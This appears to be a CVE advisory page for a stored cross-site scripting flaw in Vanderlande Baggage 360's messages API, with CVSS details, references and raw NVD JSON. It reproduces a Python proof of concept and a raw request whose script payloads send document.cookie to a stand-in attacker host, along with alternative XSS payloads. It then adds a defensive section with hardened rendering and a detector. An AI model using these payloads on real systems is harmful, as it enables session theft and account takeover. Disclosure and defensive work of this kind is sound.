Security Vulnerability Report
CVE-2025-11308 CVSS 3.5 LOW

CVE-2025-11308

Published: 2025-10-05 23:15:31
Last Modified: 2026-04-29 01:00:02

Description

A stored cross-site scripting vulnerability was identified in Vanderlande Baggage 360 7.0.0. The affected code is an unspecified handler behind the endpoint /api-addons/v1/messages: the value of the Message argument is stored and later rendered without adequate neutralisation, so a remote attacker holding a low-privileged account (PR:L) can inject script that executes in the browser of another user who views the message (UI:R). The v3.1 vector rates confidentiality and availability impact as none and integrity impact as low, with scope unchanged. The record classifies the weakness as CWE-79 (improper neutralization of input during web page generation) and CWE-94 (code injection). A proof-of-concept exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

All three scores below come from the same secondary (CNA-supplied) metrics block in the raw record; NVD has not published its own assessment (vulnerability status: Deferred).

CVSS v3.1 Score
3.5
Severity
LOW
CVSS v3.1 Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
(exploitability sub-score 2.1, impact sub-score 1.4)

CVSS v4.0 Score
2.0
Severity
LOW
CVSS v4.0 Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

CVSS v2.0 Score
4.0
Severity
MEDIUM
CVSS v2.0 Vector
AV:N/AC:L/Au:S/C:N/I:P/A:N
(exploitability sub-score 8.0, impact sub-score 2.9)

Configurations (Affected Products)

No CPE configuration data is attached to the record (NVD vulnerability status: Deferred), so the affected product is known only from the description:

Vanderlande Baggage 360 7.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. It is the proof of concept by YasserREED that the record's references point to. It needs a valid low-privileged session on the target (the PR:L in the vector), and the payload only fires when another user views the stored message.
```python
# CVE-2025-11308 - Vanderlande Baggage 360 Stored XSS PoC
# Vulnerability: Stored Cross-Site Scripting via /api-addons/v1/messages
# Parameter: Message (unfiltered)
# Author: YasserREED

import requests

# Target configuration
TARGET_URL = "https://target-vanderlande-baggage360.com"
API_ENDPOINT = "/api-addons/v1/messages"
FULL_URL = TARGET_URL + API_ENDPOINT

# Attacker session credentials (low privilege account required)
SESSION_COOKIES = {
    "session": "authenticated_session_token_here"
}

# Malicious XSS payload - stored in the Message parameter
XSS_PAYLOAD = {
    "Message": "<script>fetch('https://attacker-server.com/steal?cookie=' + document.cookie);</script>",
    "subject": "Normal Subject",
    "recipient": "admin"
}


def exploit_stored_xss():
    """
    Send a malicious message containing an XSS payload to the vulnerable endpoint.
    The payload is stored on the server and executed when other users
    view the message.
    """
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
    }

    try:
        # Step 1: Authenticate (if needed)
        # session = requests.Session()
        # session.post(TARGET_URL + "/login", data=credentials)

        # Step 2: Submit the malicious payload via the Message parameter.
        # verify=False is kept from the original PoC; it disables TLS
        # certificate validation for the request.
        response = requests.post(
            FULL_URL,
            json=XSS_PAYLOAD,
            cookies=SESSION_COOKIES,
            headers=headers,
            verify=False
        )

        if response.status_code in (200, 201):
            print("[+] XSS payload successfully stored on the server!")
            print("[+] Waiting for victim (e.g., admin) to view the message...")
        else:
            print(f"[-] Failed to store payload. Status code: {response.status_code}")
            print(f"[-] Response: {response.text}")
    except Exception as e:
        print(f"[-] Error occurred: {str(e)}")


if __name__ == "__main__":
    exploit_stored_xss()

# HTTP Proof of Concept (raw request):
#
# POST /api-addons/v1/messages HTTP/1.1
# Host: target-vanderlande-baggage360.com
# Content-Type: application/json
# Cookie: session=<valid_session_cookie>
#
# {
#   "Message": "<script>alert('XSS');document.location='https://attacker.com/?c='+document.cookie</script>",
#   "subject": "Test",
#   "recipient": "admin"
# }

# Alternative payloads:
# - <img src=x onerror=alert(document.cookie)>
# - <svg/onload=alert(document.cookie)>
# - "><script>alert(document.cookie)</script>
```
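
The rendering defect that the description and the PoC above target, shown as an added example that is neither Vanderlande's code nor the PoC author's: the record does not show how Baggage 360 renders stored messages, so render_vulnerable() is a hypothetical reconstruction of the CWE-79 pattern the description implies (untrusted text concatenated into HTML), render_hardened() is the contextual output encoding a defender would expect after a fix, and the detector parses the rendered fragment the way a browser would so that the check cannot be fooled by escaped text that merely looks like a payload. The payloads are the ones from the PoC; the inbox row template, the sample request body and the canary are constructed here.

```python
"""Stored XSS through a JSON "Message" field: vulnerable rendering, hardened rendering, post-fix check.

Added example, not Vanderlande's code or the PoC author's. render_vulnerable() is a
hypothetical reconstruction of the CWE-79 pattern the record describes; the row
template and sample request are constructed; the payloads come from the PoC.
"""
import html
import json
from html.parser import HTMLParser

# Payloads from the PoC on this page.
POC_PAYLOADS = [
    "<script>fetch('https://attacker-server.com/steal?cookie=' + document.cookie);</script>",
    "<img src=x onerror=alert(document.cookie)>",
    "<svg/onload=alert(document.cookie)>",
    '"><script>alert(document.cookie)</script>',
]

# Constructed request body in the shape the PoC posts; only "Message" is named in the record.
SAMPLE_REQUEST = json.dumps(
    {"Message": POC_PAYLOADS[1], "subject": "Normal Subject", "recipient": "admin"}
)

# Hypothetical inbox row: the subject lands in a quoted attribute, the message in a text node.
ROW = '<tr><td title="{subject}">{message}</td></tr>'


def render_vulnerable(subject: str, message: str) -> str:
    """Untrusted strings dropped straight into markup: the CWE-79 pattern."""
    return ROW.format(subject=subject, message=message)


def render_hardened(subject: str, message: str) -> str:
    """Contextual output encoding: & < > " ' are escaped for both the attribute and the text node."""
    return ROW.format(
        subject=html.escape(subject, quote=True),
        message=html.escape(message, quote=True),
    )


class ActiveMarkupDetector(HTMLParser):
    """Parse a rendered fragment as a browser would and record what would execute:
    script-like elements, on* event-handler attributes and javascript: URLs."""

    EXECUTABLE_TAGS = {"script", "iframe", "object", "embed"}
    URL_ATTRS = {"href", "src", "action", "formaction", "xlink:href"}

    def __init__(self) -> None:
        super().__init__()
        self.findings: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag in self.EXECUTABLE_TAGS:
            self.findings.append(f"<{tag}> element")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"{name} handler on <{tag}>")
            elif name in self.URL_ATTRS and (value or "").strip().lower().startswith("javascript:"):
                self.findings.append(f"javascript: URL in {name} of <{tag}>")


def active_findings(fragment: str) -> list[str]:
    """Escaped text such as &lt;script&gt; never reaches handle_starttag, so it is not reported."""
    detector = ActiveMarkupDetector()
    detector.feed(fragment)
    detector.close()
    return detector.findings


def store_and_render(raw_body: str, renderer) -> str:
    """Take the JSON body the API receives and render it as the inbox would."""
    body = json.loads(raw_body)
    return renderer(str(body.get("subject", "")), str(body["Message"]))


def reflection_state(page: str, canary: str) -> str:
    """How a submitted canary came back: 'raw' (still vulnerable), 'encoded' (fix effective) or 'absent'."""
    if canary in page:
        return "raw"
    if html.escape(canary, quote=True) in page:
        return "encoded"
    return "absent"


def surviving_payloads(renderer) -> list[str]:
    """PoC payloads that still execute after passing through the given renderer."""
    return [p for p in POC_PAYLOADS if active_findings(renderer("subject", p))]


if __name__ == "__main__":
    for name, renderer in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        print(f"{name}: {store_and_render(SAMPLE_REQUEST, renderer)}")
        print(f"{name}: {len(surviving_payloads(renderer))} of {len(POC_PAYLOADS)} PoC payloads execute")
```

Two caveats for anyone retesting a patched instance. html.escape is correct only for HTML text and quoted-attribute contexts; if the message were written into a JavaScript string, a URL or an unquoted attribute, that context needs its own encoding, which is why reflection_state() should be run against every page that displays the field, not just the inbox list. And an HttpOnly session cookie blunts the cookie-theft payloads in the PoC but not the vulnerability: script running in an operator's session can still call the application's own API with that session.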

References

Reference URLs from the record. The two GitHub entries are the original disclosure and its proof-of-concept section by YasserREED; the vuldb.com entries are the VulDB database entries for this issue.

https://github.com/YasserREED/YasserREED-CVEs/blob/main/Vanderlande-OpenAIR-Baggage360/Stored%20Cross-Site%20Scripting%20(XSS).md
https://github.com/YasserREED/YasserREED-CVEs/blob/main/Vanderlande-OpenAIR-Baggage360/Stored%20Cross-Site%20Scripting%20(XSS).md#http-proof-of-concept-poc
https://vuldb.com/?ctiid.327189
https://vuldb.com/?id.327189
https://vuldb.com/?submit.662216

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-11308",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-05T23:15:31.403",
    "lastModified": "2026-04-29T01:00:01.613",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A vulnerability was identified in Vanderlande Baggage 360 7.0.0. This issue affects some unknown processing of the file /api-addons/v1/messages. Such manipulation of the argument Message leads to cross site scripting. The attack may be performed from remote. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 2.0,
            "baseSeverity": "LOW",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "privilegesRequired": "LOW",
            "userInteraction": "PASSIVE",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "LOW",
            "vulnAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "PROOF_OF_CONCEPT",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N",
            "baseScore": 3.5,
            "baseSeverity": "LOW",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.1,
          "impactScore": 1.4
        }
      ],
      "cvssMetricV2": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "2.0",
            "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N",
            "baseScore": 4.0,
            "accessVector": "NETWORK",
            "accessComplexity": "LOW",
            "authentication": "SINGLE",
            "confidentialityImpact": "NONE",
            "integrityImpact": "PARTIAL",
            "availabilityImpact": "NONE"
          },
          "baseSeverity": "MEDIUM",
          "exploitabilityScore": 8.0,
          "impactScore": 2.9,
          "acInsufInfo": false,
          "obtainAllPrivilege": false,
          "obtainUserPrivilege": false,
          "obtainOtherPrivilege": false,
          "userInteractionRequired": false
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-79"},
          {"lang": "en", "value": "CWE-94"}
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/YasserREED/YasserREED-CVEs/blob/main/Vanderlande-OpenAIR-Baggage360/Stored%20Cross-Site%20Scripting%20(XSS).md", "source": "[email protected]"},
      {"url": "https://github.com/YasserREED/YasserREED-CVEs/blob/main/Vanderlande-OpenAIR-Baggage360/Stored%20Cross-Site%20Scripting%20(XSS).md#http-proof-of-concept-poc", "source": "[email protected]"},
      {"url": "https://vuldb.com/?ctiid.327189", "source": "[email protected]"},
      {"url": "https://vuldb.com/?id.327189", "source": "[email protected]"},
      {"url": "https://vuldb.com/?submit.662216", "source": "[email protected]"},
      {"url": "https://github.com/YasserREED/YasserREED-CVEs/blob/main/Vanderlande-OpenAIR-Baggage360/Stored%20Cross-Site%20Scripting%20(XSS).md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"},
      {"url": "https://github.com/YasserREED/YasserREED-CVEs/blob/main/Vanderlande-OpenAIR-Baggage360/Stored%20Cross-Site%20Scripting%20(XSS).md#http-proof-of-concept-poc", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}
    ]
  }
}
```